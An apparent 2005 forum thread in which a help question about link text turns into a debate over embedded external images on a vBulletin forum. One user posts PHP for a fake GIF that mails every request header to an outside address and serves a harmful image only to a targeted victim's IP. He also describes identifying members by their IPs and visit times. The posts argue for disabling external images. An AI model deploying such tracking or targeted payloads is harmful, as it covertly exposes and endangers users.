Links with link text

john_childs · September 30, 2005, 2:40am

How do you do links with link text now? You used to be able to make a link with link text that you define. So you could make a link that says Google and it would take you to http://www.google.com I don’t see an option in the editor to be able to add link text now.

john_childs · September 30, 2005, 3:22am

OK, now I see what the problem is. I had switched to the Enhanced Interface editor (the WYSIWYG editor) and it doesn’t have an option to let you add the link text unless you manually type in the vB url code. I switched back to the Standard Editor and the link button lets me add the url text. So the Enhanced Interface editor is bad for creating links. The Standard Editor is better.

Testing: Google

harper · September 30, 2005, 7:50am

This is me

leo · September 30, 2005, 4:03pm

Nothing new, but just a case to consider:


# step 1
on unicyclist.com
[IMG]http://blackh.at/trace.gif[/IMG]


$ step 2
# on blackh.at's .htaccess or httpd.conf
AddType application/x-httpd-php .gif


<?php
// step 3
// content of http://blackh.at/trace.gif
header("Content-Type: image/gif");
include("http://blackh.at/other.gif");
$body = gmdate("U");
foreach ($_SERVER as $k => $v) {
  $body .= "$k => $v
";
  }
mail("datamining[x]errori.st", "hit", $body);
?>

So wait for you victom to post, and you will receive an e-mail saying the REQUEST_METHOD was post, including the exact time it was posted.
In other words… enabling to users to include external images, will also enable to retrieve “sensitive” info of each user to all other users.
And some PTR’s of IP’s reflect pretty well the location of the user; no need for bedroom cam’s anymore!

Besides that even images can be harmfull. Especially those without updates of service packs -for whatever reason-. Not long ago even eBay and Google were spreading -for a short while, but still- images in ads that contained binary js, executing other exploits on the victom PC.
So, what about:


<?php
// step 4
// content of http://blackh.at/trace.gif
header("Content-Type: image/gif");
if($_HTTP['REMOTE_ADDR'] == "ip_of_gilby") {
  // hide from Gilby
  include("http://blackh.at/harmless.gif");
  }
else if ($_HTTP['REMOTE_ADDR'] == "ip_of_victom") {
  // inject the victom
  include("http://blackh.at/harmfull.gif");
  }
// notify ourself
$body = gmdate("U");
foreach ($_SERVER as $k => $v) {
  $body .= "$k => $v
";
  }
mail("sniper[x]errori.st", "we've got'm", $body);
?>

To me protecting against bad content is an end-user responsibility in the 1st place, but protecting against privacy violation becomes a bit more a website-owner responsibility, so personally I would like to see it disabled, even though I don’t expect it to become a big deal.

Gilby · September 30, 2005, 8:03pm

Leo, what’s the problem here? I don’t think you could get a certain users IP address as no sign of a post is being sent when an image loaded.

What exactly are you asking to be disabled?

MERCYME · September 30, 2005, 8:06pm

Hey GILBY hows the gallery coming…?

Gilby · September 30, 2005, 8:31pm

the time remaining listed appears to be going up though…

and I got to move a few things around once this is complete.

gallery time remaining.gif

MERCYME · September 30, 2005, 8:34pm

man I probably won’t be able to catch it tonight, but the second I wake up it should be done! So thats cool.

john_childs · September 30, 2005, 8:57pm

It’s only a privacy issue. Any site or things like email can embed tracking gifs that will allow the server that serves the image to get your IP address. Nothing new there. It’s easy enough to find my IP address through other means. Heck, just send me an email that embeds a tracking image. Or send me an email that I’ll respond to and you’ll most likely get my IP address in the header of my reply (Hotmail adds an X-Originating-IP header). It’s easy to find people’s IP address.

The security problem Leo makes is that he can use that info to serve a specific image just to that IP address and a different image to everyone else. So he could embed an image in his post and everyone but me would see a neat unicycle picture, I’d see the goatse man. Interesting little game if someone was so inclined. The security problem is if Leo can manage to take advantage of an exploit in an image format or other embeddable media format and he could use that to attack a specific user, or every user here if he was so inclined. Nothing new there. It’s been a risk since BBSs began. You used to worry about ANSI bombs and other things, now you worry about possible exploits in media formats and other “safe” file formats.

You could force people to only be able to IMG link to files that are hosted at unicyclist.com or done as an attachment. That would reduce the possibility of using an image to spy or track people. I don’t see the need. Interesting to do thought experiments about exploits like that but no need to be paranoid.

Gilby · September 30, 2005, 9:18pm

But I am not seeing how you could target a specific user.

john_childs · September 30, 2005, 9:32pm

Leo posted some PHP code that supposedly would allow him to serve a good image to everyone else and a harmful image to the victim. All he needs is the IP address of the victim so he can ID that specific person. Getting the IP address of someone here wouldn’t be too difficult.

When the victim loads the page with the IMG tag going to Leo’s site he’ll have his server check the IP address of everyone accessing that image. If it’s the IP address of the victim then serve the bad image. If it’s not the victim then serve the good image.

Gilby · September 30, 2005, 9:34pm

but how do you get a specific user’s IP address.

john_childs · September 30, 2005, 9:43pm

He could watch the Who’s Online or watch a specific thread for who’s currently looking at the thread. Then match up those times with his server logs for what IP address has accessed that image at those times. Could be automated with a bot that watches the thread and logs the time that different people visit.

Same could be done by sending a PM to a specific person that embeds an IMG tag that tracks the IP address of who access that image.

There are lots of ways to get someones IP address even if you don’t have admin or mod powers here.

leo · September 30, 2005, 11:03pm

Well…

I had no time to search for the font as in your new logo. As well I did’nt include any proxy busters yet, but make a post and I can compare the time-string of what I captured with what’s mentioned here.

Or even without an reply… if I see four page-visits, right after my reply;

ip666.msp.mn.home.com,
office.some.cerials-factory.com,
staff.washington.edu,
dsl666.wa.wcom.com…
then it wont be hard to guess exactly who’s who.

I was not even that bright like John to include it within PM’s, but that emphasizes the example (and that there’s always people smarter and more efficient than I am).

These two:


[IMG]http://etc.
and
<img src="http://etc.

The “problem” has two sides:

privacy
security (as virusses can be spreaded trough your website, among your users).

So attaching images (so that they become local) should be fine (especially if you build in virus-scanning -and especially mime-checks- on upload).
Also consider zip files could be a potential risk, in case they are x times zipped.

Gilby · September 30, 2005, 11:50pm

And that’s just it, you’d have to guess. There is no sure way to ensure that you get a specific user’s IP address from a forum thread.

leo · October 1, 2005, 1:28pm

post to sync time, will be edited in a minute.

leo · October 1, 2005, 1:46pm

Then my guess is that you’ve used two machines to watch this threath, both windows, both firefox. One on different comcast dailups, and above post from 67.128.20x.x

In a threath like “funny pictures” it might be some harder than in a topic like “text on links”, but who sais you can’t do detection for a longer term?
Also the img can be transparent and 1x1px.

AND again then you can tryly do personal targeting*, just like the p in pm stands for personal.
(* in case img inside pm’s are enabled).

But who sais I’m not some frustraded teen with too much time, and who does’nt care who the victom will be?

Gilby · October 1, 2005, 2:50pm

Nope. I don’t think my IP address has changed in a few months and that’s not it. That IP address is a qwest user, not comcast.

I don’t think they are enabled.

Then you might be successful at finding a user that has a computer that can be accessed from the 'net, hasn’t been getting patches with a specific setup that you know how to exploit, and isn’t already overloaded with spamming zombie processes.

leo · October 3, 2005, 1:29am

Well lets include that image once more here…

…on this page, and then have a look at the end of today at this list. Of course you can browse the forum with lynx, or trough the onion router, but I was more concerned about the non- and half-aware average user/victom.

Well, not only I think they are enabled: I’m sure they are enabled, after I checked it. Watch your own PM’s for the one from me and you will see.

Correct, but what if I’m someone like promo or proxo recently, or whatever trolling id, and just like to target only unicyclist.com users, or only a specific unicyclist.com user…?
By now you must be convinced that I can do phising for remote info. I just realized I can even can calculate the exact time a user spend on writing a reply.

On condition that, and asuming there is, an option/parameter for an vBulletin-admin to disable external urls, and keep relative url’s possible…
-in other words: it not bother any user, and benefit the un/aware vulnerable users*, and most important: disallowing other ab/users to capture any remote info-
…then what keeps you from doing so?

even with having all patches, service-packs of your favourite OS and/or security software up to date, you still can be vulnerable for so called private exploits; security issues that are’nt reported so that abusers can use them for a while untill they got discovered.